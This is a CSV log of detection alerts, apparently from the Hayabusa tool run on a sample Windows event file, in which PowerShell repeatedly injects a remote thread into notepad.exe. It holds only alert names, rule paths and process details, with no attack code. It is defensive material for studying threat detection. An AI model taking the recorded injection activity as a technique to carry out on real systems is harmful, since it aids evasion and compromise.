2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
